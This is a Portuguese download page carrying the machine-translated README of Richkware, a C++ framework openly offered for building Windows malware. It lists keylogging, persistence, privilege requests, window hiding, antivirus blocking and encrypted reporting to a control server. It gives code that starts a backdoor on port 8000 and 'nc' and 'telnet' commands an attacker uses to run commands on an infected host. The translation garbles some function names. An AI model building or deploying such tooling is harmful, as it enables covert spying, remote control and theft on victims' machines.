Página Inicial>Relacionado com a programação>C/C++
Baixar

Richkware

Estrutura para criar malware do Windows, escrito em C ++.

Descrição

Richkware é uma biblioteca de funções de rede e SO, que você pode usar para criar malware. A composição dessas funções permite que o aplicativo assuma comportamentos referentes aos seguintes tipos de malware:

  • Vírus
  • Vermes
  • Robô
  • Spyware
  • Keylogger
  • Scareware

Projetos relacionados

Richkware-manager-Server: Serviço para o gerenciamento de hosts nos quais está presente uma instância de malware desenvolvido usando a estrutura Richkware .

Richkware-manager-Client: Client of Richkware-manager-servidor , que ele obtém a lista de todos os hosts do servidor e pode enviar qualquer tipo de comandos para eles.

Documentação

En ISTO
Apresentação Pdf Pdf
Relatório Pdf Pdf

Funções

Rede

  • Servidor ( Network.h ): Módulo para o gerenciamento de um servidor multi-thread, que permite receber comandos da Internet (Richkware-manager-client ou console) de acordo com o protocolo específico.
    • Protocolo ( protocolo.h ):
      1. Comandando remotamente a execução (id 1)
      2. (Trabalho em andamento)
  • Rede ( Network.h ):
    • RawRequest : envie uma solicitação para um servidor;
    • UPLOUPINFOTORICHKWAREMANAGERSERVER : Envie informações para Richkware-manager-Server

Sistema

  • Armazenamento ( armazenamento.h ):

    • Salvamento e carga : salve o estado do aplicativo (criptografado) para:
      • Registre -se (SalveValuereg e LoadValuereg)
      • Arquivo (SalveValuEtofile e LoadValueFromFile)
    • Persistência : Instale -se permanentemente no sistema.

  • Isadmin e RequestAdMinPrivileGes ( richkware.h ): verifique e requerem privilégios de administrador;

  • StealthWindow ( richkware.h ): ocultar aplicativos;

  • OpenApp ( richkware.h ): aplicativos arbitrários abertos;

  • Keylogger ( richkware.h ): armazena em um arquivo todas as teclas pressionadas;

  • BlockApps e UnblockApps ( BlockApps.h ): Aplicações de bloco e desbloqueio (antivírus, ...).

Criptografia

  • Encrypt e descriptografar ( Crypto.h ): RC4 (padrão), Blowfish.
  • Encoda e decodifique ( Crypto.h ): Base64 (Defualt), Hex.

Outro

  • Randmouse ( richkware.h ): mova aleatoriamente o cursor do mouse;
  • Hibernação ( Richkware.h ): Sistema de Hibernato.

Requisitos

Estes são os requisitos básicos para construir e usar Richkware:

  • Fazer ou cmake
  • Mingw

Comece

Open main.cpp e crie uma instância de Richkware.

Com richkware-manager-server

Se você implantou o RMS, pode inicializar o malware da seguinte forma: 

    int main() {
           Richkware richkware("Richk","DefaultPassword","192.168.99.100", "8080", "associatedUser");
            ...
            return 0;
        }

que ele recebe uma chave segura do Richkware-manager-servidor e define a chave como chave de criptografia. O padrão é usado como chave de criptografia temporária para garantir uma comunicação segura com o RMS e, se o malware não puder alcançar o RMS para obter seu ket de criptografia, ele usará o DefaultPass como chave de criptografia.

Sem richkware-manager-server

Caso contrário, se você não implantou o RMS, poderá usar: 

 Richkware richkware("Richk","richktest");

Dessa forma, ele usa "richktest" como chave de criptografia.

Compilar

Após a implementação do Main.CPP , você pode compilar da seguinte maneira.

Usando Mingw para Windows ou Mingw Cross Compiler for Linux Build Environment 

 make

Usando o Microsoft C ++ Compiler (Visual Studio)

  • C/C ++> Pré -processador> Definições de pré -processador, adicione "_crt_secure_no_warnings"
  • Linker> Input> Dependências adicionais, adicione "ws2_32.lib"

Exemplos de uso

No exemplo a seguir, chamamos de " servidor ", um malware desenvolvido usando a estrutura Richkware e na qual foi ativado a função para criar um servidor e " cliente ", o criador (hacker) do malware que está tentando estabelecer uma conexão com o PC infectado.

Lado do servidor

Comandando remotamente a execução

Função de chamadas Função StartServer no principal, ele inicia o servidor em uma porta, no exemplo a seguir é a porta TCP 8000. Lembre -se de que, se uma porta já for usada por outro programa, você não poderá usar essa porta, até que o programa seja interrompido. 

 int main () {
    ...
	richkware.network.server.Start("8000");
    ...
}

Lado do cliente

Conecte-se usando o Richkware-manager-client

Em todos os sistemas em que a máquina virtual Java está instalada, você pode usar o RichKware-manager-client; caso contrário, se não estiver presente, você poderá usar facilmente um terminal.

Conecte -se usando o terminal em sistemas Unix

Nos sistemas Unix, você pode usar o NetCat e executar o seguinte comando: 

 nc <serverName> 8000

Se o servidor recebeu a solicitação na porta aberta e conseguir criar uma conexão, respostas ao cliente confirmando o estabelecimento da conexão, depois disso, você pode escrever: 

 [[1]]COMMAND

onde o comando é um comando que deve ser executado no host infectado onde o servidor está em execução.

Conecte -se usando o terminal no Windows

No Windows, você pode usar o Telnet , da mesma maneira: 

 telnet <serverName> 8000

... 

 [[1]]COMMAND
Expandir
Informações adicionais
Aplicativos Relacionados
Recomendado para você
Informações Relacionadas Todos